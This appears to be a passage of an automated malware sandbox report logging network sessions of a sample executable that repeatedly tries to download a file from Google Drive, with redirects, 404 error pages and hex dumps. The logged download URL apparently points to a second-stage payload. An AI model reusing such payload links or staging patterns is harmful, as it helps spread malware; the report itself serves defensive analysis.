                                                    X-GUploader-UploadID: AKDAyIuFBQubsEGfme0XUlCdg4JAWWdppaZSyqlAHKtA0YqQcqPefdo6SOgvNSSurEB9nuaT
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 07 Mar 2025 22:30:59 GMT
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-auBnxkYXn9HeSTFd86SO0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-03-07 22:30:59 UTC1534INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 34 77 59 6a 30 4f 2d 65 51 49 36 32 31 48 51 65 49 69 75 73 6d 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4wYj0O-eQI621HQeIiusmA">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                    2025-03-07 22:30:59 UTC118INData Raw: 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                    Data Ascii: ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.749694142.250.186.1424435684C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-07 22:31:01 UTC428OUTGET /uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
                                                    2025-03-07 22:31:02 UTC1610INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 07 Mar 2025 22:31:01 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-Rg6WYaj946sWYSVkiuZIkw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.749695142.250.186.334435684C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-07 22:31:04 UTC470OUTGET /download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
                                                    2025-03-07 22:31:04 UTC1534INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AKDAyIsojyuZ9lVhC-LQxj-2OrXYze_eNZn-L6B4gH8dZf1oW5X-GxponLWkEseExxaOkdGi
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 07 Mar 2025 22:31:04 GMT
                                                    Content-Security-Policy: script-src 'nonce-UfblFQhV8jeLXmCY-TgCyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-03-07 22:31:04 UTC1534INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 44 50 46 73 61 70 2d 30 5f 51 30 43 34 33 47 64 79 50 62 74 46 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="DPFsap-0_Q0C43GdyPbtFA">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                    2025-03-07 22:31:04 UTC118INData Raw: 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                    Data Ascii: ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.749696142.250.186.1424435684C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-07 22:31:06 UTC428OUTGET /uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
                                                    2025-03-07 22:31:07 UTC1610INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 07 Mar 2025 22:31:07 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-ef3E9Jew7rywnWssYQqHIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.749697142.250.186.334435684C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-07 22:31:09 UTC470OUTGET /download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
                                                    2025-03-07 22:31:09 UTC1534INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AKDAyItM5CJLo7i77_JfotP65MlINdkk4Um641emJXpAMgvJTAzagDyfAfs3CsWmGtciuog5
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 07 Mar 2025 22:31:09 GMT
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-5fuob5HZ8nt0piMF6TaQlw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-03-07 22:31:09 UTC1534INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 46 4b 38 6d 76 33 78 4f 6d 52 67 46 34 69 53 49 44 45 62 50 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VFK8mv3xOmRgF4iSIDEbPw">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                    2025-03-07 22:31:09 UTC118INData Raw: 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                    Data Ascii: ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    10192.168.2.749698142.250.186.1424435684C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-07 22:31:11 UTC428OUTGET /uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
                                                    2025-03-07 22:31:12 UTC1610INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 07 Mar 2025 22:31:12 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-EYNhR3W2q1p9jAgGov5B9w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    11192.168.2.749699142.250.186.334435684C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-07 22:31:14 UTC470OUTGET /download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
                                                    2025-03-07 22:31:15 UTC1533INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AKDAyIuOBsP8F2q0Ed-YeUizVbuD5wDtcE_sMXjLysawkfNqRSzSJG1onvH8l-DtATwmR1U
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 07 Mar 2025 22:31:14 GMT
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-HnWUlhdtlInDuuvz81zWlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-03-07 22:31:15 UTC1533INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 78 32 35 6a 58 6c 6f 32 45 2d 43 5a 78 4a 49 39 4c 46 4c 45 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Tx25jXlo2E-CZxJI9LFLEw">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                    2025-03-07 22:31:15 UTC119INData Raw: 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                    Data Ascii: <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    12192.168.2.749700142.250.186.1424435684C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-07 22:31:16 UTC428OUTGET /uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
                                                    2025-03-07 22:31:17 UTC1610INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 07 Mar 2025 22:31:17 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-34UdtbDYINowCQ1WHYgsAw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
